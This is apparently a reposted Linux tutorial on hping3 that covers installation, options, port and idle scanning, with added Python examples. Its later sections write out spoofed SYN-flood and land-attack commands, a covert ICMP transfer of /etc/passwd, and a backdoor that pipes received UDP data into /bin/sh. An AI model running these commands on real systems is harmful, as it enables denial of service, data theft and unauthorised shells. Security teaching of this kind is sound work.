[Comprehensive explanation of Linux commands] 141. hping3: Test the security of the network and host

hping3

Test network and host security

Additional information

hping is an open source tool for generating and parsing TCP/IP packets. Its author is Salvatore Sanfilippo. The latest version, hping3, can be driven from Tcl scripts that call its API. hping is a standard tool for security auditing, firewall testing and similar tasks. Its advantage is that every field of a packet can be set by hand, so a target can be probed precisely and in detail.

Install

yum install libpcap-devel tcl-devel    # libpcap for capture, Tcl for hping3's scripting support
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

Options

-h, --help            show help.
-v, --version         show version information.
-c, --count           number of packets to send; the timeout applied after the last one (countreached_timeout) can be edited in hping2.h.
-i, --interval        wait between packets; uX means X microseconds (e.g. -i u1000), default is 1 second. Lowering it matters for throughput and for idle/spoofing scans, see the hping-howto. --fast is an alias for 10 packets per second.
-n, --numeric         numeric output, do not resolve host names.
-q, --quiet           quiet mode.
-I, --interface       interface name, e.g. eth0.
-V, --verbose         verbose output; a TCP reply then looks like: len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D, --debug           debug mode, useful when hping misbehaves (interface detection, data link layer access, interface settings, ...).
-z, --bind            bind Ctrl+Z to the TTL field (by default Ctrl+Z changes the destination port).
-Z, --unbind          unbind Ctrl+Z.

Modes (default mode is TCP):
-0, --rawip           RAW IP mode: hping sends an IP header followed by the data.
-1, --icmp            ICMP mode: by default hping sends ICMP echo requests; --icmptype/--icmpcode select other types and codes.
-2, --udp             UDP mode: by default hping sends UDP packets to port 0; --baseport, --destport and --keep change that.
-9, --listen signature   listen mode: hping waits for packets containing the signature and dumps the data that follows it.

IP options:
-a, --spoof hostname  fake the source address; the firewall will not log your real IP, but you will not see the replies either.
-t, --ttl             TTL of the outgoing packets.
-H, --ipproto         IP protocol number (RAW IP mode only).
-W, --winid           use Windows-style id byte order; Unix and Windows hosts order the IP id field differently.
-r, --rel             relativize the id field (show the difference between consecutive ids), see HPING-HOWTO.
-f, --frag            fragment the packets, to test how the target handles reassembly; the default "virtual mtu" is 16 bytes.
-x, --morefrag        set the More Fragments flag; a stream of never-completed fragments can exhaust the target's reassembly buffers (denial of service).
-y, --dontfrag        set the Don't Fragment flag, useful for exploring path MTU discovery.
-g, --fragoff         set the fragment offset.
-m, --mtu             set the virtual MTU; packets larger than it are fragmented.
-G, --rroute          include the RECORD_ROUTE option and display the recorded route (at most 9 hops), which works even when the host filters ICMP.

ICMP options:
-C, --icmptype        ICMP type (default: echo request).
-K, --icmpcode        ICMP code (default 0).
--icmp-ipver          IP version of the IP header embedded in the ICMP payload.
--icmp-iphlen         header length of the embedded IP header, default 5 (5 x 4 = 20 bytes).
--icmp-iplen          total length of the embedded IP packet.
--icmp-ipid           id of the embedded IP header, default random.
--icmp-ipproto        protocol of the embedded IP header, default TCP.
--icmp-cksum          ICMP checksum (default: computed correctly).
--icmp-ts             alias for --icmptype 13 (ICMP timestamp request).
--icmp-addr           alias for --icmptype 17 (ICMP address mask request).

UDP/TCP options:
-s, --baseport        base source port; hping increments it for every packet so replies can be matched to probes (default: random).
-p, --destport        destination port (default 0); a trailing + increments the port for every reply received, ++ increments it for every packet sent.
-k, --keep            keep the source port fixed instead of incrementing it.
-w, --win             TCP window size (default 64).
-O, --tcpoff          set a fake TCP data offset (normally tcphdrlen / 4).
-M, --setseq          set the TCP sequence number.
-L, --setack          set the TCP ack number.
-Q, --seqnum          show only the sequence numbers of the replies, useful for sequence-number analysis.
-S, --syn / -A, --ack / -R, --rst / -F, --fin / -P, --push / -U, --urg   set the corresponding TCP flag.

Common options (used by the examples on this page):
-d, --data            data size in bytes (default 0).
-E, --file            read the data from a file.
-e, --sign            add a signature to the data.
-B, --safe            enable the "safe" protocol (lost packets are retransmitted during file transfer).
-T, --traceroute      traceroute mode (start with TTL 1 and increase it).
-8, --scan            scan mode, e.g. --scan 1-30,70-90 -S.

Hping3 function

Hping3 mainly has the following typical functional applications:

Firewall testing

Use Hping3 to specify various packet fields and conduct detailed tests on the firewall in turn. Please refer to: http://0daysecurity.com/articles/hping3_examples.html

Test how the firewall responds to ICMP packets, whether it lets traceroute through, whether a given port is open, and how it holds up under a denial of service (DoS) attack. For example, test the target firewall with a Land attack (the source address is set equal to the destination address, so the target keeps trying to establish connections with itself):

hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

port scan

Hping3 can also scan target ports. It lets you set the TCP flags, packet length and other fields of the probe. The following example checks whether port 80 of the target is open:

hping3 -I eth0  -S 192.168.10.1 -p 80

Here, -I eth0 selects the eth0 interface, -S sets the SYN flag of the TCP packet, and -p 80 sets the destination port to probe. A SYN/ACK reply (flags=SA) means the port is open, a RST (flags=RA) means it is closed, and no reply usually means a firewall dropped the probe.

hping3 supports a very rich set of port probing methods; it supports almost all of nmap's scan types except the connect scan, because hping3 only sends and receives packets and does not maintain connections. Its --scan mode probes port ranges, and hping3 gives more precise control over the probes it sends, which makes it easier to fine-tune a result. Its scan performance and overall processing capability cannot be compared with nmap's, though, so it is generally used to scan a small number of ports on a small number of hosts.
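Interpreting the replies is the part hping3 leaves to you. The following is an added example, not code from the original page or from the hping3 project: it parses hping3's standard reply lines (the "len=... ip=... sport=... flags=..." format) into a per-port state, using the SYN/ACK, RST and no-reply rules from the port scan above. The sample output is constructed for the example, not captured from a real host.

```python
import re
from collections import OrderedDict

# hping3 prints one line per reply, for example:
#   len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=0.6 ms
# "sport" is the target port that answered, "flags" the TCP flags of the answer.
REPLY_RE = re.compile(
    r"len=(?P<len>\d+) ip=(?P<ip>[\d.]+) ttl=(?P<ttl>\d+) (?:DF )?id=(?P<id>\d+) "
    r"sport=(?P<sport>\d+) flags=(?P<flags>[A-Z]*) seq=(?P<seq>\d+) "
    r"win=(?P<win>\d+) rtt=(?P<rtt>[\d.]+) ms"
)

# Constructed sample of what `hping3 -I eth0 -S 192.168.10.1 -p ++22 -c 4` style
# probing might print (not real output).
SAMPLE_OUTPUT = """\
HPING 192.168.10.1 (eth0 192.168.10.1): S set, 40 headers + 0 data bytes
len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=0.6 ms
len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=22 flags=SA seq=1 win=29200 rtt=0.5 ms
len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=23 flags=RA seq=2 win=0 rtt=0.4 ms
""".splitlines()


def parse_reply(line):
    """Return the fields of one hping3 reply line as a dict, or None for other lines."""
    m = REPLY_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    for key in ("len", "ttl", "id", "sport", "seq", "win"):
        d[key] = int(d[key])
    d["rtt"] = float(d["rtt"])
    return d


def classify(flags):
    """Map the TCP flags of a reply to a SYN-scan port state."""
    f = set(flags)
    if "S" in f and "A" in f:
        return "open"        # SYN/ACK: something is listening
    if "R" in f:
        return "closed"      # RST (usually RST/ACK): host reachable, nothing listening
    return "other"


def scan_states(probed_ports, output_lines):
    """Combine the probed ports with the replies; ports without a reply are
    reported as filtered/dropped, which is what a silently dropping firewall looks like."""
    states = OrderedDict((p, "no reply (filtered or dropped)") for p in probed_ports)
    for line in output_lines:
        reply = parse_reply(line)
        if reply is None:
            continue
        states[reply["sport"]] = classify(reply["flags"])
    return states


def demo():
    # Port 443 was probed but never answered in the constructed output.
    return scan_states([22, 23, 80, 443], SAMPLE_OUTPUT)


if __name__ == "__main__":
    for port, state in demo().items():
        print(f"{port:>5}  {state}")
```

In practice the lines come from `hping3 ... 2>&1 | python3 thisscript.py` or a captured log; the banner line and any "ICMP ... unreachable" lines are skipped because they do not match the reply pattern.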

Idle scan

Idle scanning (Idle Scanning) is a method of anonymously scanning remote hosts. This method was also invented by Salvatore Sanfilippo, the author of Hping3. Currently, Idle scanning is also implemented in Nmap.

The scanning principle is as follows. First find an idle host (a "zombie" with no other network traffic, whose IP ID increases by one for every packet it sends). The attacker sends a probe to the idle host and reads the IP ID from the reply. The attacker then sends a SYN packet (a SYN is assumed here) to a port of the remote target with the source address spoofed as the idle host. If the port is open, the target replies SYN/ACK to the idle host, which answers with a RST and thereby consumes one more IP ID; if the port is closed, the target sends a RST, which the idle host ignores. Finally the attacker probes the idle host again and compares the two IP IDs: a difference of two means the target replied (port open), a difference of one means it did not (port closed or filtered), and anything larger means the zombie was not idle and the result is unreliable.
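To make the three-party exchange concrete, here is an added simulation (not code from the page or from hping3/nmap) of the idle scan logic described above. The zombie, target and attacker are plain Python objects exchanging dicts instead of real packets; the host names, port sets and starting IP ID are assumptions chosen for the example. It also shows the failure mode the text mentions: a zombie that is not actually idle makes the IP ID delta meaningless.

```python
class Zombie:
    """The idle host: its IP ID counter increases by one for every packet it sends."""

    def __init__(self, start_ipid=1000):
        self.ipid = start_ipid

    def _next_ipid(self):
        self.ipid += 1
        return self.ipid

    def receive(self, pkt):
        # An unsolicited SYN/ACK is answered with a RST (which carries a fresh IP ID).
        # A RST is silently ignored, so a closed target port costs no IP ID.
        if pkt["flags"] == "SA":
            return {"src": "zombie", "dst": pkt["src"], "flags": "R", "ipid": self._next_ipid()}
        return None

    def background_traffic(self, packets):
        """Other traffic the zombie sends on its own (breaks the 'idle' assumption)."""
        for _ in range(packets):
            self._next_ipid()


class Target:
    """The host being scanned: open ports answer SYN with SYN/ACK, closed ports with RST,
    filtered ports never answer. Replies go to the packet's source address."""

    def __init__(self, open_ports, filtered_ports=()):
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive(self, pkt):
        if pkt["dport"] in self.filtered_ports or pkt["flags"] != "S":
            return None
        flags = "SA" if pkt["dport"] in self.open_ports else "R"
        return {"src": "target", "dst": pkt["src"], "flags": flags, "dport": pkt["dport"]}


def probe_ipid(zombie):
    """Attacker probe: a SYN/ACK to the zombie elicits a RST whose IP ID we can read."""
    return zombie.receive({"src": "attacker", "dst": "zombie", "flags": "SA", "dport": 80})["ipid"]


def idle_scan(zombie, target, port, zombie_background_packets=0):
    """Return 'open', 'closed|filtered' or 'unreliable' for one target port."""
    before = probe_ipid(zombie)

    # Spoofed SYN: the source is the zombie, so the target's answer goes to the zombie.
    reply = target.receive({"src": "zombie", "dst": "target", "flags": "S", "dport": port})
    if reply is not None:
        zombie.receive(reply)          # SYN/ACK -> RST (+1 IP ID); RST -> nothing

    zombie.background_traffic(zombie_background_packets)
    after = probe_ipid(zombie)

    delta = after - before
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "unreliable"                # zombie was not idle, or packets were lost


def demo():
    zombie = Zombie()
    target = Target(open_ports={22, 80}, filtered_ports={443})
    return {
        80: idle_scan(zombie, target, 80),
        23: idle_scan(zombie, target, 23),
        443: idle_scan(zombie, target, 443),
        "busy": idle_scan(zombie, target, 80, zombie_background_packets=3),
    }


if __name__ == "__main__":
    for port, state in demo().items():
        print(port, state)
```

Note that the attacker never sees the target's reply directly, which is what makes the scan anonymous from the target's point of view: the target only ever sees the zombie's address. It also shows why a closed port and a filtered port are indistinguishable with this technique.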

denial of service attack

Hping3 can easily build a denial of service attack. For example, to flood the target with SYN packets, with the source address forged as 192.168.10.99 and one SYN sent every 1000 microseconds (-i u1000):

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

Other attacks such as smurf, teardrop, land attack, etc. are also easy to construct.

file transfer

Hping3 can transfer files inside TCP, UDP or ICMP packets, which amounts to a covert channel built on those protocols. The receiving end listens for packets carrying a user-chosen signature string and writes out whatever data follows the signature. Start the receiving end with:

hping3 192.168.1.159 --listen signature --safe --icmp

This watches for the signature in incoming ICMP packets and extracts the file content that follows it.

On the sending end, send the file in signed ICMP packets:

hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd

This sends the /etc/passwd file to the receiving host (192.168.1.108 in this example) in ICMP packets with a 100-byte data field (-d 100) carrying the signature "signature" (--sign signature). --safe on the receiving side enables hping's retransmission protocol so that lost packets do not silently truncate the file.
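The following is an added example, not code from the page or from the hping3 project, showing the mechanism behind the two commands above: an ICMP echo request whose data field is the signature followed by a slice of the file, and a listener that checks the ICMP checksum, locates the signature and returns the bytes after it. It does not reproduce hping3's exact wire layout or its --safe retransmission protocol; the framing, the chunking scheme and the sample /etc/passwd lines are assumptions constructed for the example. The same signature-then-data framing is what the UDP listener in the next section relies on.

```python
import struct

ICMP_ECHO_REQUEST = 8


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(signature: bytes, payload: bytes, data_size: int,
                       ident: int = 0x1234, seq: int = 0) -> bytes:
    """ICMP echo request whose data field is signature + payload, padded with NULs
    to data_size (the role of -d N). Assumed framing, not hping3's byte layout."""
    data = (signature + payload)[:data_size].ljust(data_size, b"\x00")
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + data)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + data


def extract_signed_data(packet: bytes, signature: bytes):
    """Listener side: reject damaged packets, then return the data after the signature.
    Trailing NULs are assumed to be padding, so binary content ending in NUL bytes
    would need an explicit length field instead."""
    if len(packet) < 8 or inet_checksum(packet) != 0:
        return None                      # bad checksum: not a packet we trust
    data = packet[8:]
    idx = data.find(signature)
    if idx < 0:
        return None                      # no signature: ordinary ICMP traffic, ignore
    return data[idx + len(signature):].rstrip(b"\x00")


def chunked_transfer(signature: bytes, content: bytes, data_size: int):
    """Split content into echo requests and reassemble it on the listener side.
    Without a sequencing/retransmission layer this is only correct if every
    packet arrives, once, in order."""
    chunk = data_size - len(signature)
    if chunk <= 0:
        raise ValueError("data_size must exceed the signature length")
    packets = [
        build_echo_request(signature, content[i:i + chunk], data_size, seq=n)
        for n, i in enumerate(range(0, len(content), chunk))
    ]
    received = b"".join(extract_signed_data(p, signature) for p in packets)
    return packets, received


# Constructed sample content standing in for /etc/passwd.
SAMPLE_CONTENT = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)


def demo(data_size: int = 40):
    packets, received = chunked_transfer(b"signature", SAMPLE_CONTENT, data_size)
    return {"packets": len(packets), "packet_len": len(packets[0]),
            "roundtrip_ok": received == SAMPLE_CONTENT}


if __name__ == "__main__":
    print(demo())
```

Two things the example makes visible that the commands hide: every packet is a valid echo request to anyone sniffing the link, so the "secrecy" rests entirely on nobody looking at ICMP payloads, and the listener accepts any packet containing the signature, so the signature is an identifier, not an authenticator.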

Trojan function

If hping3 can be started on the remote host, it can act as a simple Trojan: it listens on a port and, once a signed packet arrives, passes the received data to a shell. This is similar to netcat's backdoor function.

Example: on the victim, listen on local UDP port 53 (the DNS port, chosen so that the traffic looks like name resolution) for packets carrying the signature from host 192.168.10.66, and pipe the received data into /bin/sh for execution.

On the Trojan (victim) side:

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

On the controlling side:

echo ls > test.cmd
hping3 192.168.10.44 -p 53 -d 100 --udp --sign signature --file ./test.cmd

This sends the file containing the ls command, prefixed with the signature, to UDP port 53 of host 192.168.10.44, with a 100-byte packet data field.

Of course, this is only a minimal demonstration. In a real scenario the controlling side can drive the shell to perform far more advanced and complex operations, which is also why a listener that executes anything following a known signature, with no authentication, should be treated as a backdoor in its own right.

Origin blog.csdn.net/qq_33681891/article/details/132897339